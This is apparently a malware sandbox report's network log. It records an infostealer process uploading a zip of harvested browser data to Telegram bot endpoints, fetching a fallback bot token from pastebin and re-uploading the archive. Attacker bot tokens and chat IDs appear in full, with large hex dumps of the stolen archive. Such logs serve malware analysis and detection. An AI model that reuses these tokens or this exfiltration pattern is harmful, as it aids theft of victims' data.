2024-07-06 11:28:46 UTC	16355	OUT	Data Raw: 16 6b 8c fb a2 b5 30 b0 df 12 5f c0 a2 aa 67 3d 99 eb a5 b3 56 c8 86 b6 9e 01 fb 0c dd 62 6a a3 34 e7 7c 08 bb 60 1d af 40 f8 2b be fa eb c0 0f eb f0 74 e3 f3 2c de 19 f5 48 7e d6 f4 21 06 57 8c 2a aa 87 58 c6 05 8f 52 af 4c e7 46 b4 5f c0 42 a9 da 35 77 8b 46 18 e7 f5 91 6b 98 06 f7 bd 70 52 90 5e af d3 a4 78 a8 7d 4d 70 45 1b 51 80 6f 45 1a 6f 3b 45 ab d3 f7 f3 ab 7d 58 46 27 ff c9 be 19 16 2c 13 ea 11 5b c8 09 05 3b 52 87 5a 6e ba 69 c6 0e 29 e9 e7 4d 6c a7 76 84 d5 da 43 7c bd 0c b9 e7 f3 08 57 fa 6d 3c 2a 96 18 8f 7b f3 e4 08 84 98 ce 87 9b b1 ba d3 5e d3 b8 98 0a 82 db b9 d4 a7 82 2d 15 05 ce 14 ce 7d ba 3b 93 93 58 df fd d0 eb 51 82 e7 54 de d9 4b e2 6f 13 98 ba 4a cb df da 4a 7b e1 ea 07 5f 3b ad fa fd fd 03 50 4b 03 04 14 00 00 00 08 00 51 40 44 Data Ascii: k0_g=Vbj4\|`@+t,H~!WXRLF_B5wFkpR^x}MpEQoEo;E}XF',[;RZni)MlvC\|Wm<{^-};XQTKoJJ{_;PKQ@D
2024-07-06 11:28:46 UTC	16355	OUT	Data Raw: 66 7f 6e 3d 2a b4 0a 18 a0 12 53 87 e9 6d af fe 78 d6 dc 68 89 d6 ae 2a 10 a2 7c 5c b1 58 c9 cf 05 7d 9b e1 f2 a7 ac 86 ba 24 0b dc 74 cd b0 e0 d9 2e c7 f5 22 7f 75 04 f2 3b cb 38 25 ec be b0 63 d8 ab 0d 79 fa 30 35 e5 34 ce 9b e7 cc da 5f b8 da 59 2b 51 c9 16 6f 99 58 cf c7 1f 35 ab d0 a5 31 fd ed 89 94 2e 3d 4c 51 c5 98 c5 74 52 7e df 67 18 6b 8b 28 3f fc c1 e0 2c 9e 3a fd 7a a7 d6 e6 3c 74 33 dd ad 9c 73 e5 1d dc a5 77 db 37 14 63 ab 83 6c 2a d5 31 a5 a1 95 20 af 58 b3 75 f1 36 f3 45 9f e2 cd f8 91 ac 76 6e 78 f2 fa 04 ea d9 64 f7 1f 2c 6a 24 c1 22 96 c9 fc 61 e8 31 de f7 33 cd 28 7d 79 9a ef cc 6e 24 55 7a 54 0f 34 44 a8 bf 3f 7f 50 4b 03 04 14 00 00 00 08 00 51 40 44 57 59 f1 45 0f 84 02 00 00 02 04 00 00 34 00 00 00 47 72 61 62 62 65 72 5c 44 52 49 Data Ascii: fn=Smxh\|\X}$t."u;8%cy054_Y+QoX51.=LQtR~gk(?,:z<t3sw7cl*1 Xu6Evnxd,j$"a13(}yn$UzT4D?PKQ@DWYE4Grabber\DRI
2024-07-06 11:28:46 UTC	16355	OUT	Data Raw: df a0 9e 19 75 da f7 45 ee e5 34 b2 7b 28 ab 4b bc 52 af dc e2 67 6d 47 d5 5c 6f 68 c9 65 4d 6d 38 44 34 46 6a 9b ef 2e 79 7f 5e 29 d9 6d ab 2f d0 c3 99 62 6d 8c 2d d4 ee c5 ab 8f 80 bf 11 30 ae be eb f5 95 a3 28 e3 c8 bb 2b 87 c6 0b 5d f6 c2 91 ed d2 55 1c 57 4f 6b 71 99 c1 56 13 43 30 67 50 af a7 97 7e a7 b7 a9 dd 1c e6 1e 37 03 56 3b a1 49 c7 3c ae b5 7b 16 5d 9f ba dc 12 68 56 2b 1f be 8b bd 94 f5 da 75 c9 d2 53 6f f9 50 1b 1f eb 13 db 43 6e 8f 53 e3 cf 45 a0 80 c2 2e e5 dd 69 3e 9b 85 3a f3 41 83 36 94 7b 8c 31 9c 94 36 70 aa fc fb 22 32 f4 ca a9 9e 0b 2f 91 d1 cf 6b de ab 70 3f 49 6a 44 28 3e 31 aa 05 7d 9d b8 e3 1c fa f7 e7 0f 50 4b 03 04 14 00 00 00 08 00 51 40 44 57 50 ad d3 d6 82 02 00 00 02 04 00 00 35 00 00 00 47 72 61 62 62 65 72 5c 44 52 49 Data Ascii: uE4{(KRgmG\oheMm8D4Fj.y^)m/bm-0(+]UWOkqVC0gP~7V;I<{]hV+uSoPCnSE.i>:A6{16p"2/kp?IjD(>1}PKQ@DWP5Grabber\DRI
2024-07-06 11:28:46 UTC	16355	OUT	Data Raw: 8a 7c 36 97 e0 11 2c 3f 2e 7a b9 d3 67 f5 b8 b1 fb 6d d6 b7 6f aa c2 26 f9 78 85 e2 3f dc 65 1a 3f 3e b3 68 98 40 00 76 82 ac b7 2e ee f9 0b 48 bb 84 fc a6 6e 7c a3 ff f4 75 90 dd ad 2f 2d ea 46 02 1d 57 0a a1 f0 40 e2 81 20 00 91 41 9f f7 a8 40 c7 66 99 2b 39 7a dc e7 04 6f 42 27 cc fb 47 26 55 e2 f1 91 39 93 30 d0 e3 39 e9 62 77 18 08 80 82 78 ef 6c d3 b2 4d 5f 33 cb 5b 19 e3 26 46 5d cb a8 e2 1f 34 4b 85 6a d2 2b 5a 9f 97 55 7a cc 2c 7f 06 a5 c2 17 ad 09 40 9a 6a 4c 5b db 99 33 56 fe 14 b5 61 6a bc dc e1 ce de b3 9e 63 e9 5d 96 65 5e 2e b2 f1 91 6c 3c 02 74 45 a2 17 2e e8 5f 2a 97 dc 54 3b 9b f8 fb 7b b1 18 9d f4 ec 99 cf 2f 5f 36 8d ae 78 50 88 88 59 7f b1 28 14 51 b2 a6 70 49 1e f6 ea 55 33 be a6 8b 1f 5f d8 10 fc f3 72 0f 31 57 f0 87 6a 2f 48 20 2c Data Ascii: \|6,?.zgmo&x?e?>h@v.Hn\|u/-FW@ A@f+9zoB'G&U909bwxlM_3[&F]4Kj+ZUz,@jL[3Vajc]e^.l<tE._*T;{/_6xPY(QpIU3_r1Wj/H ,
2024-07-06 11:28:46 UTC	16355	OUT	Data Raw: e0 ce c6 3b 87 87 3a 7e 5d 17 21 75 e8 49 1a 71 1a 8f 94 5d a5 04 c9 93 3f 49 f2 62 83 2f c3 e9 6e a6 41 a5 6c 39 aa f0 f5 f0 cf 3a 09 0e 35 de 73 f6 f1 47 46 17 89 c2 16 c4 93 f8 a1 0b 6f ad e3 9f 26 61 9d e4 d0 67 c9 b4 80 c2 6c 2d ba 5a e6 6d 62 2c 15 70 86 0b 78 9a 17 4b 8e 8b 95 b3 2a d6 bf 94 29 84 4b 69 85 0d b8 8e 3e 8b e4 fa c6 59 a5 6c e6 42 2e 35 bd 0d cc 1e 2b 8b 35 8e 68 6e ad dc 63 a8 bb c1 69 0e eb a1 03 c7 c4 46 88 21 26 e3 7c 97 66 84 b5 46 d7 b3 74 c2 9f 76 5b b4 ce 4f c9 28 95 2a 0d bb 78 7f 0b 08 bb 05 9c 14 88 10 65 55 85 03 9f e0 bf df 50 1a 8b 51 64 ce 80 b0 b9 6b c8 1f 0b cb c6 43 41 52 42 09 22 75 e6 16 21 76 14 87 7b bf 6b e7 87 9c cc 4d 99 6a f1 7c f8 b1 d3 66 37 7d 0b 08 51 cf a8 5d 9f cf 55 8a 13 e6 9b b8 2c 8b 2c e2 69 30 3b Data Ascii: ;:~]!uIq]?Ib/nAl9:5sGFo&agl-Zmb,pxK)Ki>YlB.5+5hnciF!&\|fFtv[O(xeUPQdkCARB"u!v{kMj\|f7}Q]U,,i0;
2024-07-06 11:28:46 UTC	16355	OUT	Data Raw: 95 de 41 aa d2 7b ef 25 39 3b 09 f8 fa fe be 6f 9c 73 ef 1d f7 9e f3 cf 1d 83 30 b2 b3 77 d6 da d9 6b cd 39 9f 39 d7 5c f3 d9 25 f8 bc a8 eb a8 06 b9 fd 33 ff fd 96 4e 10 b5 3e ae 8a d0 a1 96 57 2a 32 d5 7b 1c 19 58 b6 5c 4a fb 74 bd d0 2c 9e d7 05 1f 5a 47 43 49 fb d5 e4 3e 5e 41 d6 8c fe ce 68 74 a5 8a 1e 6e 64 60 86 fa 7b bd a6 9c c5 cb 10 a6 9a a7 65 fe 1d 5a 24 7c a3 b8 22 9e 56 0a df cb 71 47 a4 a2 5b a5 2a 2b 19 f9 7e 7c f2 ec 5f f3 6f d7 fe d2 67 6d f4 fd 5b 8f 79 fb f4 86 2c 3e 8c ce 06 07 32 1d fa b5 e6 5d ce 4b be 67 34 f8 c9 72 15 dc bb 88 94 e2 03 8f c2 12 6f ef 60 af d2 f6 7b ac 4a 5b 2e 22 26 f0 94 2a c0 11 b0 64 3d de fd 84 02 d5 d6 20 1b 0b ab 21 28 d0 4d 01 14 28 9f f1 a0 d4 7c b5 06 39 9b 87 02 c1 4b 93 26 55 0e 2e 64 9d d8 31 b4 7f 14 Data Ascii: A{%9;os0wk99\%3N>W2{X\Jt,ZGCI>^Ahtnd`{eZ$\|"VqG[+~\|_ogm[y,>2]Kg4ro`{J[."&*d= !(M(\|9K&U.d1
2024-07-06 11:28:47 UTC	16355	OUT	Data Raw: ba bd f6 fc 64 5c d8 2e de 79 60 3c e5 4d 95 d1 61 cf c4 dc 1e 7d 02 d8 6d 65 e6 2b e2 5c 8d 9d 2d ad d5 84 55 e8 ec 4f c7 32 08 ab 87 51 31 81 12 d2 ea 49 63 93 b8 cd 14 3b 8f 6b 93 88 65 cd b0 ad c9 86 61 02 dd 96 55 e1 44 7b 6e 5b 2c 31 a3 7c 59 18 28 d4 f4 92 24 32 37 24 95 ec 47 87 e4 58 fb ed a5 4d e4 bb e1 22 64 4d fe eb 0c 35 43 85 ec 6f 05 df 7e 79 de a2 0a ad 16 64 cf 1d 9f d5 83 0f 16 b7 f0 e0 b2 3d 82 c9 de 5a ee 54 7d 72 80 a3 1e cd 1c 62 b9 48 49 33 53 7f 58 ba 39 66 65 d7 79 fd 04 ae db 44 52 c4 65 c2 f2 88 d2 e4 d2 cb 5c 71 0b fe 70 a9 70 b9 61 7b 8b 11 3d 6f 83 9a 02 6e 49 44 b7 65 54 7c 69 94 7b b5 ae 5a c4 f0 ae 5c 5b 9a 40 d0 10 87 c3 16 3f 48 0a 57 12 cf 8e fa 86 6f a2 16 bd 2f a3 05 4d 59 46 ba 7e fb cb ae 2f ab 02 6b a5 d5 c5 fc ac Data Ascii: d\.y`<Ma}me+\-UO2Q1Ic;keaUD{n[,1\|Y($27$GXM"dM5Co~yd=ZT}rbHI3SX9feyDRe\qppa{=onIDeT\|i{Z\[@?HWo/MYF~/k
2024-07-06 11:28:47 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Sat, 06 Jul 2024 11:28:47 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49899	149.154.167.220	443	420	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-06 11:28:46 UTC	254	OUT	POST /bot6082381502:AAEEe5dVvSMdEf-_fKUh7iRqcNun3Q5DzxM/sendDocument?chat_id=5795480469 HTTP/1.1 Content-Type: multipart/form-data; boundary="2ac1b142-5e04-41ec-aec2-aa44ac23098b" Host: api.telegram.org Content-Length: 137522 Expect: 100-continue
2024-07-06 11:28:46 UTC	25	IN	HTTP/1.1 100 Continue
2024-07-06 11:28:46 UTC	40	OUT	Data Raw: 2d 2d 32 61 63 31 62 31 34 32 2d 35 65 30 34 2d 34 31 65 63 2d 61 65 63 32 2d 61 61 34 34 61 63 32 33 30 39 38 62 0d 0a Data Ascii: --2ac1b142-5e04-41ec-aec2-aa44ac23098b
2024-07-06 11:28:46 UTC	265	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 39 66 63 66 66 66 37 32 37 33 39 35 62 38 64 36 63 36 30 64 64 62 38 65 36 34 66 34 63 33 35 61 5c 6a 6f 6e 65 73 40 31 33 34 33 34 39 5f 65 6e 2d 43 48 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 43 25 33 41 25 35 43 55 73 65 72 73 25 35 43 6a 6f 6e 65 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 39 66 63 66 66 66 37 32 37 33 39 35 62 38 64 36 63 36 30 64 64 62 38 65 36 34 66 34 63 33 35 61 25 35 43 6a 6f 6e 65 73 25 34 30 31 33 34 33 34 39 5f 65 6e 2d Data Ascii: Content-Disposition: form-data; name=document; filename="C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH.zip"; filename*=utf-8''C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5C9fcfff727395b8d6c60ddb8e64f4c35a%5Cuser%40134349_en-
2024-07-06 11:28:46 UTC	16355	OUT	Data Raw: 50 4b 03 04 14 00 00 00 00 00 4f 47 e6 58 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 42 72 6f 77 73 65 72 73 5c 45 64 67 65 5c 50 4b 03 04 14 00 00 00 08 00 71 3b e6 58 51 33 92 06 4a 00 00 00 69 00 00 00 1e 00 00 00 42 72 6f 77 73 65 72 73 5c 46 69 72 65 66 6f 78 5c 42 6f 6f 6b 6d 61 72 6b 73 2e 74 78 74 53 56 56 56 70 4f 2d 51 f0 48 cd 29 50 50 56 56 e6 02 62 05 e7 d2 e2 92 fc dc cc aa 54 05 b7 cc a2 d4 b4 fc 0a b8 0c 48 a9 67 5e 59 7e 4e 59 6a 0a 5c d0 31 29 bf b4 44 21 b4 18 59 55 49 66 5e ba 42 70 49 62 51 09 54 21 00 50 4b 03 04 14 00 00 00 08 00 71 3b e6 58 63 c2 65 e7 53 00 00 00 5e 00 00 00 1c 00 00 00 42 72 6f 77 73 65 72 73 5c 46 69 72 65 66 6f 78 5c 48 69 73 74 6f 72 79 2e 74 78 74 53 56 56 56 70 cb 2c 4a 4d cb af 50 08 28 ca 2c 4b 4c ae Data Ascii: PKOGXBrowsers\Edge\PKq;XQ3JiBrowsers\Firefox\Bookmarks.txtSVVVpO-QH)PPVVbTHg^Y~NYj\1)D!YUIf^BpIbQT!PKq;XceS^Browsers\Firefox\History.txtSVVVp,JMP(,KL
2024-07-06 11:28:46 UTC	16355	OUT	Data Raw: 39 6a e3 ea 08 11 66 35 c1 fa 65 4b 16 6b 8c fb a2 b5 30 b0 df 12 5f c0 a2 aa 67 3d 99 eb a5 b3 56 c8 86 b6 9e 01 fb 0c dd 62 6a a3 34 e7 7c 08 bb 60 1d af 40 f8 2b be fa eb c0 0f eb f0 74 e3 f3 2c de 19 f5 48 7e d6 f4 21 06 57 8c 2a aa 87 58 c6 05 8f 52 af 4c e7 46 b4 5f c0 42 a9 da 35 77 8b 46 18 e7 f5 91 6b 98 06 f7 bd 70 52 90 5e af d3 a4 78 a8 7d 4d 70 45 1b 51 80 6f 45 1a 6f 3b 45 ab d3 f7 f3 ab 7d 58 46 27 ff c9 be 19 16 2c 13 ea 11 5b c8 09 05 3b 52 87 5a 6e ba 69 c6 0e 29 e9 e7 4d 6c a7 76 84 d5 da 43 7c bd 0c b9 e7 f3 08 57 fa 6d 3c 2a 96 18 8f 7b f3 e4 08 84 98 ce 87 9b b1 ba d3 5e d3 b8 98 0a 82 db b9 d4 a7 82 2d 15 05 ce 14 ce 7d ba 3b 93 93 58 df fd d0 eb 51 82 e7 54 de d9 4b e2 6f 13 98 ba 4a cb df da 4a 7b e1 ea 07 5f 3b ad fa fd fd 03 50 Data Ascii: 9jf5eKk0_g=Vbj4\|`@+t,H~!WXRLF_B5wFkpR^x}MpEQoEo;E}XF',[;RZni)MlvC\|Wm<{^-};XQTKoJJ{_;P
2024-07-06 11:28:46 UTC	16355	OUT	Data Raw: c1 2b d3 be ce 64 71 56 ee 17 37 ec 66 7f 6e 3d 2a b4 0a 18 a0 12 53 87 e9 6d af fe 78 d6 dc 68 89 d6 ae 2a 10 a2 7c 5c b1 58 c9 cf 05 7d 9b e1 f2 a7 ac 86 ba 24 0b dc 74 cd b0 e0 d9 2e c7 f5 22 7f 75 04 f2 3b cb 38 25 ec be b0 63 d8 ab 0d 79 fa 30 35 e5 34 ce 9b e7 cc da 5f b8 da 59 2b 51 c9 16 6f 99 58 cf c7 1f 35 ab d0 a5 31 fd ed 89 94 2e 3d 4c 51 c5 98 c5 74 52 7e df 67 18 6b 8b 28 3f fc c1 e0 2c 9e 3a fd 7a a7 d6 e6 3c 74 33 dd ad 9c 73 e5 1d dc a5 77 db 37 14 63 ab 83 6c 2a d5 31 a5 a1 95 20 af 58 b3 75 f1 36 f3 45 9f e2 cd f8 91 ac 76 6e 78 f2 fa 04 ea d9 64 f7 1f 2c 6a 24 c1 22 96 c9 fc 61 e8 31 de f7 33 cd 28 7d 79 9a ef cc 6e 24 55 7a 54 0f 34 44 a8 bf 3f 7f 50 4b 03 04 14 00 00 00 08 00 51 40 44 57 59 f1 45 0f 84 02 00 00 02 04 00 00 34 00 00 Data Ascii: +dqV7fn=Smxh\|\X}$t."u;8%cy054_Y+QoX51.=LQtR~gk(?,:z<t3sw7cl*1 Xu6Evnxd,j$"a13(}yn$UzT4D?PKQ@DWYE4
2024-07-06 11:28:46 UTC	16355	OUT	Data Raw: ca 06 3d b4 7a 1a b5 6b 5e 95 c8 90 df a0 9e 19 75 da f7 45 ee e5 34 b2 7b 28 ab 4b bc 52 af dc e2 67 6d 47 d5 5c 6f 68 c9 65 4d 6d 38 44 34 46 6a 9b ef 2e 79 7f 5e 29 d9 6d ab 2f d0 c3 99 62 6d 8c 2d d4 ee c5 ab 8f 80 bf 11 30 ae be eb f5 95 a3 28 e3 c8 bb 2b 87 c6 0b 5d f6 c2 91 ed d2 55 1c 57 4f 6b 71 99 c1 56 13 43 30 67 50 af a7 97 7e a7 b7 a9 dd 1c e6 1e 37 03 56 3b a1 49 c7 3c ae b5 7b 16 5d 9f ba dc 12 68 56 2b 1f be 8b bd 94 f5 da 75 c9 d2 53 6f f9 50 1b 1f eb 13 db 43 6e 8f 53 e3 cf 45 a0 80 c2 2e e5 dd 69 3e 9b 85 3a f3 41 83 36 94 7b 8c 31 9c 94 36 70 aa fc fb 22 32 f4 ca a9 9e 0b 2f 91 d1 cf 6b de ab 70 3f 49 6a 44 28 3e 31 aa 05 7d 9d b8 e3 1c fa f7 e7 0f 50 4b 03 04 14 00 00 00 08 00 51 40 44 57 50 ad d3 d6 82 02 00 00 02 04 00 00 35 00 00 Data Ascii: =zk^uE4{(KRgmG\oheMm8D4Fj.y^)m/bm-0(+]UWOkqVC0gP~7V;I<{]hV+uSoPCnSE.i>:A6{16p"2/kp?IjD(>1}PKQ@DWP5
2024-07-06 11:28:46 UTC	16355	OUT	Data Raw: 67 3a f5 ef 75 12 7f ae e5 9d e7 d0 8a 7c 36 97 e0 11 2c 3f 2e 7a b9 d3 67 f5 b8 b1 fb 6d d6 b7 6f aa c2 26 f9 78 85 e2 3f dc 65 1a 3f 3e b3 68 98 40 00 76 82 ac b7 2e ee f9 0b 48 bb 84 fc a6 6e 7c a3 ff f4 75 90 dd ad 2f 2d ea 46 02 1d 57 0a a1 f0 40 e2 81 20 00 91 41 9f f7 a8 40 c7 66 99 2b 39 7a dc e7 04 6f 42 27 cc fb 47 26 55 e2 f1 91 39 93 30 d0 e3 39 e9 62 77 18 08 80 82 78 ef 6c d3 b2 4d 5f 33 cb 5b 19 e3 26 46 5d cb a8 e2 1f 34 4b 85 6a d2 2b 5a 9f 97 55 7a cc 2c 7f 06 a5 c2 17 ad 09 40 9a 6a 4c 5b db 99 33 56 fe 14 b5 61 6a bc dc e1 ce de b3 9e 63 e9 5d 96 65 5e 2e b2 f1 91 6c 3c 02 74 45 a2 17 2e e8 5f 2a 97 dc 54 3b 9b f8 fb 7b b1 18 9d f4 ec 99 cf 2f 5f 36 8d ae 78 50 88 88 59 7f b1 28 14 51 b2 a6 70 49 1e f6 ea 55 33 be a6 8b 1f 5f d8 10 fc Data Ascii: g:u\|6,?.zgmo&x?e?>h@v.Hn\|u/-FW@ A@f+9zoB'G&U909bwxlM_3[&F]4Kj+ZUz,@jL[3Vajc]e^.l<tE._*T;{/_6xPY(QpIU3_
2024-07-06 11:28:46 UTC	16355	OUT	Data Raw: 9b 29 7e e9 f0 ea e9 9f 34 d9 e8 0b e0 ce c6 3b 87 87 3a 7e 5d 17 21 75 e8 49 1a 71 1a 8f 94 5d a5 04 c9 93 3f 49 f2 62 83 2f c3 e9 6e a6 41 a5 6c 39 aa f0 f5 f0 cf 3a 09 0e 35 de 73 f6 f1 47 46 17 89 c2 16 c4 93 f8 a1 0b 6f ad e3 9f 26 61 9d e4 d0 67 c9 b4 80 c2 6c 2d ba 5a e6 6d 62 2c 15 70 86 0b 78 9a 17 4b 8e 8b 95 b3 2a d6 bf 94 29 84 4b 69 85 0d b8 8e 3e 8b e4 fa c6 59 a5 6c e6 42 2e 35 bd 0d cc 1e 2b 8b 35 8e 68 6e ad dc 63 a8 bb c1 69 0e eb a1 03 c7 c4 46 88 21 26 e3 7c 97 66 84 b5 46 d7 b3 74 c2 9f 76 5b b4 ce 4f c9 28 95 2a 0d bb 78 7f 0b 08 bb 05 9c 14 88 10 65 55 85 03 9f e0 bf df 50 1a 8b 51 64 ce 80 b0 b9 6b c8 1f 0b cb c6 43 41 52 42 09 22 75 e6 16 21 76 14 87 7b bf 6b e7 87 9c cc 4d 99 6a f1 7c f8 b1 d3 66 37 7d 0b 08 51 cf a8 5d 9f cf 55 Data Ascii: )~4;:~]!uIq]?Ib/nAl9:5sGFo&agl-Zmb,pxK)Ki>YlB.5+5hnciF!&\|fFtv[O(xeUPQdkCARB"u!v{kMj\|f7}Q]U
2024-07-06 11:28:46 UTC	16355	OUT	Data Raw: 24 87 50 69 69 a4 a4 53 11 69 a4 4b a4 44 3a 04 a4 7b e6 9d 99 01 7f fe ff f7 ae 7b d7 7a 6f bd fb d6 7a 6b 31 ac 39 73 ce d9 fb c4 de df da 7b 7f 3f 3b 44 35 4b 7a ce ea b0 db df 0b 52 36 75 5f 52 1b e0 ab 0a 1e 68 fb bc 43 bd f3 9d 40 05 97 ff 2a a3 35 fb 5d 64 11 c7 eb 46 08 6f a0 a1 a4 fd 64 22 44 50 98 35 6b b0 3d 16 53 a5 aa 8f 1f 15 9c a1 91 a2 df 92 b3 74 05 c6 54 67 56 1e d8 a5 7d 81 6f 0c 5f c4 db 46 f1 4b 05 fe a8 74 cc 57 e9 aa 2a 46 be b6 0f de 83 6b 81 9d 3a 1f 07 6c 1f 7c a9 ef b3 ec 9c 59 97 23 44 d0 d9 e1 c1 66 c2 3e d5 bd c9 79 ca 67 4e 43 98 24 5f c9 b5 93 96 5c b2 ef 55 54 ea eb 1b e2 53 d6 79 8f 55 79 d3 4d c4 04 99 5c 0d 3a 02 d6 ac 47 3b 1f d0 c0 e7 3a 54 73 51 2d 0c 0d dc 14 40 03 05 8c fb 65 96 ab 75 a8 b9 7c 34 80 2c 4b 9c 52 dd Data Ascii: $PiiSiKD:{{zozk19s{?;D5KzR6u_RhC@5]dFod"DP5k=StTgV}o_FKtWFk:l\|Y#Df>ygNC$_\UTSyUyM\:G;:TsQ-@eu\|4,KR
2024-07-06 11:28:46 UTC	16355	OUT	Data Raw: 6a ba 2b fc d7 27 23 34 c0 f8 f5 cb ea 78 78 d4 e1 fe 78 b7 92 6b 96 ed 63 62 a8 7a bd a8 db dd f5 ee f3 76 08 e8 c5 d0 00 be 4b 2a 65 32 f2 c1 66 8a 55 16 36 81 8c 63 0a 40 cc b0 9f ff a8 5d 8f 3b 01 7d a2 fb 4e de 9d 92 3a 61 3b bc ba 97 29 7d 26 3c e9 8f 17 44 27 19 42 2e 66 f9 6f 24 3f 0e 8b 7e 6e 9a af cb e8 e6 2c a7 fd 48 f0 c9 45 85 04 0b e2 fe 00 c8 60 5b a7 bd 1b 81 cd 6d eb 8a 97 4e fc 4d 37 8c e7 8a df b4 2a 1f 7a 10 3c d9 0f c6 23 f5 f7 0f 63 f7 3a cb fd a8 aa 48 bb fa 63 ec 38 61 47 63 fa ef 0b 01 41 32 f6 26 2d 7b 45 48 a7 d6 c5 26 7c 61 3d 9b 36 3a 33 82 ea 1c d7 91 94 04 3b c1 2e e2 9c cf 12 31 8e 43 bf ad 7b 74 f5 6b 2f 79 ee 3a 59 6d bc 25 5c ed 20 fc cc dd 45 1b 24 1a 39 2a b6 a9 35 5d 8a fc a7 24 d6 a3 0c d2 c7 91 61 a1 4e 3a 60 4b c5 Data Ascii: j+'#4xxxkcbzvKe2fU6c@];}N:a;)}&<D'B.fo$?~n,HE`[mNM7z<#c:Hc8aGcA2&-{EH&\|a=6:3;.1C{tk/y:Ym%\ E$9*5]$aN:`K
2024-07-06 11:28:47 UTC	903	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 06 Jul 2024 11:28:47 GMT Content-Type: application/json Content-Length: 515 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":26317,"from":{"id":6082381502,"is_bot":true,"first_name":"DiamotrixBotss","username":"DiamotrixBotss_bot"},"chat":{"id":5795480469,"first_name":"Diamotrix","username":"Diamotrix","type":"private"},"date":1720265327,"document":{"file_name":"C_UsersuserAppDataLocal9fcfff727395b8d6c60ddb8e64f4c35auser@13.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAJmzWaJKm8e4n3vh2EZZ4p2sskRAAEYKQACIBUAAoC_SVAJNWgVaREBfjUE","file_unique_id":"AgADIBUAAoC_SVA","file_size":137173}}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49903	172.67.19.24	443	420	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-06 11:28:47 UTC	74	OUT	GET /raw/7B75u64B HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-07-06 11:28:48 UTC	398	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:48 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 1490 Last-Modified: Sat, 06 Jul 2024 11:03:58 GMT Server: cloudflare CF-RAY: 89ef40dc5acc4388-EWR
2024-07-06 11:28:48 UTC	52	IN	Data Raw: 32 65 0d 0a 35 33 39 30 37 35 37 37 38 38 3a 41 41 46 56 36 35 59 64 75 6e 39 4f 50 34 30 67 37 38 58 78 49 35 65 44 62 56 34 32 4b 71 48 59 35 6d 55 0d 0a Data Ascii: 2e5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU
2024-07-06 11:28:48 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49905	149.154.167.220	443	420	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-06 11:28:48 UTC	254	OUT	POST /bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283662956 HTTP/1.1 Content-Type: multipart/form-data; boundary="756f27b2-8e1e-41d6-84d0-70bf6be4b848" Host: api.telegram.org Content-Length: 137522 Expect: 100-continue
2024-07-06 11:28:49 UTC	25	IN	HTTP/1.1 100 Continue
2024-07-06 11:28:49 UTC	40	OUT	Data Raw: 2d 2d 37 35 36 66 32 37 62 32 2d 38 65 31 65 2d 34 31 64 36 2d 38 34 64 30 2d 37 30 62 66 36 62 65 34 62 38 34 38 0d 0a Data Ascii: --756f27b2-8e1e-41d6-84d0-70bf6be4b848
2024-07-06 11:28:49 UTC	265	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 39 66 63 66 66 66 37 32 37 33 39 35 62 38 64 36 63 36 30 64 64 62 38 65 36 34 66 34 63 33 35 61 5c 6a 6f 6e 65 73 40 31 33 34 33 34 39 5f 65 6e 2d 43 48 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 43 25 33 41 25 35 43 55 73 65 72 73 25 35 43 6a 6f 6e 65 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 39 66 63 66 66 66 37 32 37 33 39 35 62 38 64 36 63 36 30 64 64 62 38 65 36 34 66 34 63 33 35 61 25 35 43 6a 6f 6e 65 73 25 34 30 31 33 34 33 34 39 5f 65 6e 2d Data Ascii: 